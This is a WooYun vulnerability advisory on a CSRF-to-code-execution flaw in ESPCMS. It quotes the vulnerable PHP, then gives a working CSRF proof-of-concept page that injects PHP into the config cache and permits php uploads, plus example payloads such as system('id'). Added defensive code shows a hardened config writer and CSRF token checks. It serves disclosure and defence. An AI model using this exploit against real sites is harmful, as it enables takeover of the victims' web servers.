
Vulnerability summary (24 followers)

Defect ID: wooyun-2014-075808

Title: CSRF to direct getshell in the latest version of ESPCMS

Vendor: ESPCMS (易思ESPCMS企业网站管理系统, ESPCMS enterprise website management system)

Author: menmen519

Submitted: 2014-09-11 16:08

Fix date: 2014-12-10 16:10

Published: 2014-12-10 16:10

Type: design flaw / logic error

Severity: medium

Self-assessed rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-09-11: Details sent to the vendor, awaiting vendor handling
2014-09-11: Vendor confirmed; details disclosed to the vendor only
2014-09-14: Details opened to third-party security partners
2014-11-05: Details opened to core white hats and experts in related fields
2014-11-15: Details opened to ordinary white hats
2014-11-25: Details opened to intern white hats
2014-12-10: Details disclosed to the public

Brief description:

CSRF to direct getshell in the latest version of ESPCMS.

Detailed description:

First, let us look at the problematic code.
management.php (lines 711-741):

function onsetsave() {
    $db_table = db_prefix . 'config';
    $commandfile = admin_ROOT . 'datacache/command.php';
    if (!$this->fun->filemode($commandfile)) {
        exit('false');
    }
    $old_ishtml = $this->CON['is_html'];
    $sql = 'SELECT * FROM ' . $db_table . ' WHERE groupid<=8 AND isline=0 ORDER BY groupid';
    $rs = $this->db->query($sql);
    while ($rsList = $this->db->fetch_assoc($rs)) {
        if ($rsList['groupid'] == 5 && !$this->get_app_view('bbs', 'isetup')) {
            continue;
        }
        if ($rsList['groupid'] == 7 && !$this->get_app_view('touch', 'isetup')) {
            continue;
        }
        if ($rsList['groupid'] == 8 && !$this->get_app_view('im', 'isetup')) {
            continue;
        }
        // Each config value is taken straight from the POST parameter of the same name;
        // nothing here checks a CSRF token or the request's origin
        $db_set = "value='" . $this->fun->accept($rsList['valname'], 'P') . "'";
        $db_where = 'id=' . $rsList['id'];
        $this->db->query('UPDATE ' . $db_table . ' SET ' . $db_set . ' WHERE ' . $db_where);
    }
    $this->db->query("UPDATE $db_table SET value='" . admin_URL . "' WHERE valname='domain'");
    // Regenerate datacache/command.php from the table that was just written
    $this->systemfile(true);
    // ... (remaining lines of the function are not shown on this page)
}


Having read this function, let's follow $this->systemfile(true):
class_connector.php (lines 514-543):

function systemfile($trueclass = false) {
    $commandfile = admin_ROOT . 'datacache/command.php';
    $varget = "4:'1T<#HO+W=W=RYE8VES<\"YC;B\`";
    // The cache file is rebuilt when it is missing, or whenever the caller passes true (as onsetsave() does)
    if (!is_file($commandfile) || $trueclass) {
        $sConfig = "<?php\n";
        $sConfig = $sConfig . '// uptime:' . date('Y-m-d H:i:s', time()) . "\n";
        $sConfig = $sConfig . "// ECISP.CN \n";
        $sConfig = $sConfig . "\$CONFIG=Array(\n";
        $db_table = db_prefix . 'config';
        $sql = "SELECT valname,content,value,valtype FROM $db_table where isline=0 ORDER BY groupid";
        $rs = $this->db->query($sql);
        while ($rsList = $this->db->fetch_assoc($rs)) {
            $valname = $rsList['valname'];
            $value = $rsList['value'];
            $valtype = $rsList['valtype'];
            $content = $rsList['content'];
            if ($valtype == 'int' || $valtype == 'bool') {
                // Non-empty values are emitted bare, whatever they contain
                $value = empty($value) ? 0 : $value;
                $sConfig = $sConfig . "\x20\x20\x20\x20 '" . $valname . '\'=>' . $value . ",\n";
            } else {
                // String values are pasted between single quotes with no escaping of ' or \
                $sConfig = $sConfig . "\x20\x20\x20\x20 '" . $valname . '\'=>\'' . $value . "',\n";
            }
        }
        $sConfig = $sConfig . ")\n";
        $sConfig = $sConfig . '?' . '>';
        if (!$this->fun->filewrite($commandfile, $sConfig)) {
            exit('System File Error!');
        }
    }
    // The freshly written file is included straight away, so any injected PHP runs here
    include $commandfile;
}


Now it is clear what is going on: the value is taken out of the database unchanged and written straight into the cache configuration file. Take an example.
If we configure the value sss', GPC escaping turns it into sss\' for the SQL statement, but what the database actually stores is sss', and that is what comes back when the value is read out the second time. So when the configuration file is written, the special characters have effectively had no treatment at all: the generated line reads 'valname'=>'sss'', the second quote closes the string literal, and whatever follows it is parsed as PHP code the next time command.php is included. Since onsetsave() performs no CSRF token or origin check either, all an attacker needs is for a logged-in administrator to load a page that submits the settings form.
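To make both halves of the problem concrete, here is an added example (my own code, not ESPCMS's): a writer that builds command.php the way systemfile() does, next to a hardened writer that lets var_export() serialise the values so that no stored quote or backslash can close the string literal. The rows, the function names and the payload are constructed for illustration, and the code assumes PHP 7 or later.

```php
<?php
// Added example, not ESPCMS code. Names are hypothetical.

// Constructed sample rows, shaped like the config table. The input-side escaping
// was consumed by the database, so close_content holds a literal single quote.
function sample_rows(): array {
    return [
        ['valname' => 'sitename',      'value' => 'test', 'valtype' => 'str'],
        ['valname' => 'is_close',      'value' => '0',    'valtype' => 'int'],
        ['valname' => 'close_content', 'value' => "Sorry, site under maintenance'.system('id').'", 'valtype' => 'str'],
    ];
}

// Vulnerable: values are concatenated straight into PHP source, as systemfile() does.
function build_config_vulnerable(array $rows): string {
    $s = "<?php\n\$CONFIG=Array(\n";
    foreach ($rows as $r) {
        if ($r['valtype'] === 'int' || $r['valtype'] === 'bool') {
            $v = empty($r['value']) ? 0 : $r['value'];
            $s .= "    '" . $r['valname'] . "'=>" . $v . ",\n";
        } else {
            $s .= "    '" . $r['valname'] . "'=>'" . $r['value'] . "',\n";
        }
    }
    return $s . ");\n";
}

// Hardened: build the array first and let var_export() write it. It escapes quotes
// and backslashes, so a value cannot break out of its literal, and int/bool columns
// are cast so a non-numeric value cannot be emitted as bare code either.
function build_config_safe(array $rows): string {
    $config = [];
    foreach ($rows as $r) {
        if ($r['valtype'] === 'int' || $r['valtype'] === 'bool') {
            $config[$r['valname']] = (int) $r['value'];
        } else {
            $config[$r['valname']] = (string) $r['value'];
        }
    }
    return "<?php\n\$CONFIG=" . var_export($config, true) . ";\n";
}

// Sanity check: evaluating the safe output must give back exactly the stored values,
// with the payload still inert inside its string.
function roundtrip_ok(array $rows): bool {
    $src = build_config_safe($rows);
    $CONFIG = null;
    eval(substr($src, strlen("<?php\n")));
    foreach ($rows as $r) {
        $expect = ($r['valtype'] === 'int' || $r['valtype'] === 'bool') ? (int) $r['value'] : $r['value'];
        if ($CONFIG[$r['valname']] !== $expect) {
            return false;
        }
    }
    return true;
}

$rows = sample_rows();
echo "--- vulnerable writer ---\n", build_config_vulnerable($rows);
echo "--- hardened writer ---\n", build_config_safe($rows);
echo roundtrip_ok($rows) ? "roundtrip ok\n" : "roundtrip FAILED\n";
```

In the vulnerable output the close_content line comes out as 'close_content'=>'Sorry, site under maintenance'.system('id').'', which is valid PHP that runs system('id') the moment the file is included; the hardened output carries the same text as a single escaped literal.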
Here is the process in practice:

[Screenshot: 15.png]


Now visit command.php and look at the result:

[Screenshot: 16.png]


Executes perfectly...

<html>
<body>
<!-- CSRF PoC: an ESPCMS administrator who loads this page while logged in
     has the full settings form submitted on their behalf with their session cookie. -->
<script>
function csrf_shell(){
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://192.168.10.70/ESPCMSV6000140909_INSTALL/upload/adminsoft/index.php?archive=management&action=setsave", true);
    // application/x-www-form-urlencoded is a CORS-safelisted content type, so the browser sends no preflight
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.withCredentials = true;
    // close_content carries the payload '+phpinfo(),// which lands unescaped in datacache/command.php;
    // upfile_pictype additionally adds php to the permitted upload extensions
    var body='is_close=0&close_content=%E6%8A%B1%E6%AD%89%EF%BC%9A%E7%BD%91%E7%AB%99%E6%AD%A3%E5%9C%A8%E7%BB%B4%E6%8A%A4%E4%B8%AD%EF%BC%8C%E7%BB%99%E6%82%A8%E5%B8%A6%E6%9D%A5%E4%B8%8D%E4%BE%BF%E6%B7%B1%E8%A1%A8%E6%AD%89%E6%84%8F%EF%BC%81'%2Bphpinfo()%2C%2F%2F&icpbeian=&sitename=test&admine_mail=admin%40admin.com&is_log=1&is_gzip=1&cli_time=8&default_lng=cn&is_alonelng=0&home_lng=cn&is_html=0&is_rewrite=0&file_fileex=html&entrance_file=index&file_htmldir=html%2F&is_getcache=0&is_caching=0&cache_time=3600&http_pathtype=1&member_menu=1&mem_isclose=1&mem_isseccode=1&mem_regisseccode=0&mem_isemail=0&mem_lock=www%2Cbbs%2Cdemo%2Ctest%2Cftp%2Cmail%2Cuser%2Cusers%2Cadmin%2Cadministrator&mem_isclass=0&mem_did=cn%3A0%2Cen%3A0&mem_isaddress=0&mem_isucenter=0&mem_ucdbhost=localhost&mem_ucdbuser=root&mem_ucdbpw=&mem_ucdbname=ucenter&mem_ucdbchart=utf8&mem_ucdbtable=uc_&mem_uckey=sdaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&mem_ucapi=&mem_ucchart=utf-8&mem_ucapiid=0&enquiry_menu=1&is_enquiry_memclass=0&order_menu=1&order_ismember=1&order_integral=10&order_discount=100&order_snfont=ESP-&order_moneytype=%EF%BF%A5&order_max_list=3&order_companyname=&order_contact=&order_province=&order_city=&order_add=&order_post=&order_tel=&order_moblie=&upfile_pictype=jpg%7Cpng%7Cgif%7Cphp&uifile_movertype=swf%7Cmpg%7Cflv%7Cmp4&upfile_filetype=zip%7Crar%7Cdoc%7Cxls%7Cpdf&upfile_maxsize=100000000&img_dirtype=m3&img_cfiletype=d&img_width=200&img_height=200&img_bgcolor=%23ffffff&img_quality=80&img_issmallpic=0&img_iszoom=1&img_iswater=0&img_wmt_text=ESPCMS&img_wmt_size=25&img_wmt_color=%23ffffff&img_wmt_pos=9&img_wmt_transparent=20&img_wmi_file=watermark.png&img_wmi_pos=9&img_wmi_transparent=50&input_isdes=1&input_isdescription=250&input_isdellink=0&is_inputclose=1&input_click=0&is_keylink=1&input_color=%23000000&is_email=0&smtp_type=2&mail_cat=1&smtp_server=&smtp_port=25&mail_send=&smtp_username=&smtp_password=&is_moblie=0&moblie_userid=&moblie_smssnid=&moblie_smskey=&moblie_number=&sitecoedb=7a6355a4a18b136036439cc61efe069b&scode_bgcolor=%230080ff&scode_fontcolor=%23ffffff&scode_adulterate=1&scode_shadow=0&tip_searchtime=10';
    // Send the form body as raw bytes (it is pure ASCII, so charCodeAt is safe here)
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
}
csrf_shell();
</script>
</body>
</html>


Done.
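The PoC above works only because setsave accepts any authenticated POST. As an added example (my own code, not ESPCMS's), here is the server-side check that would defeat it: a per-session anti-CSRF token that every admin form carries, verified with a constant-time comparison, plus an Origin/Referer check as defence in depth. Function names and the two sample requests are constructed for illustration; it assumes PHP 7 or later.

```php
<?php
// Added example, not ESPCMS code. Names are hypothetical.

// Issue (or reuse) the session's token. In real code pass $_SESSION as $session.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field to embed in every state-changing admin form, the settings form included.
function csrf_field(array &$session): string {
    $tok = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $tok . '">';
}

// Verify the submitted token against the session's. hash_equals() keeps the
// comparison constant-time; a missing or empty token is always rejected.
function csrf_check(array $post, array $session): bool {
    $sent = $post['csrf_token'] ?? '';
    $have = $session['csrf_token'] ?? '';
    return is_string($sent) && $sent !== '' && $have !== '' && hash_equals($have, $sent);
}

// Defence in depth: a POST fired from an attacker's page arrives with that page's
// Origin (or Referer), which is not the admin host.
function same_origin(array $headers, string $admin_host): bool {
    $src = $headers['Origin'] ?? $headers['Referer'] ?? '';
    $host = parse_url($src, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $admin_host) === 0;
}

// Gate for the setsave action: decide before a single config row is written.
function setsave_allowed(array $post, array $session, array $headers, string $admin_host): bool {
    return csrf_check($post, $session) && same_origin($headers, $admin_host);
}

// Constructed requests, not real traffic.
$session = [];
$token = csrf_token($session);

// A legitimate save from the real settings form, which carried the hidden field.
$legit_post    = ['sitename' => 'test', 'csrf_token' => $token];
$legit_headers = ['Origin' => 'http://192.168.10.70'];

// The cross-site POST from the PoC page: the attacker cannot read the victim's
// session, so there is no valid token, and the Origin is the attacker's site.
$csrf_post    = ['sitename' => 'test', 'close_content' => "x'.phpinfo().'"];
$csrf_headers = ['Origin' => 'http://attacker.invalid'];

echo 'legitimate save allowed: ', setsave_allowed($legit_post, $session, $legit_headers, '192.168.10.70') ? 'yes' : 'no', "\n";
echo 'cross-site save allowed: ', setsave_allowed($csrf_post, $session, $csrf_headers, '192.168.10.70') ? 'yes' : 'no', "\n";
```

The token check alone is sufficient against the PoC, because a cross-origin page can neither read the admin's session nor guess 32 random bytes; the Origin check is there so that a token leak (for example through a reflected value) still does not turn into a one-click configuration write. Fixing the CSRF does not remove the underlying bug in systemfile(), which still has to stop pasting database values into PHP source.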

Proof of vulnerability:

Fix recommendation:

Copyright notice: please credit menmen519@乌云 (WooYun) when reposting.


Vendor response

Vendor reply:

Severity: low

Rank: 2

Confirmed: 2014-09-11 19:30

Vendor comment:

Thank you for reporting this vulnerability.

Latest status:

None yet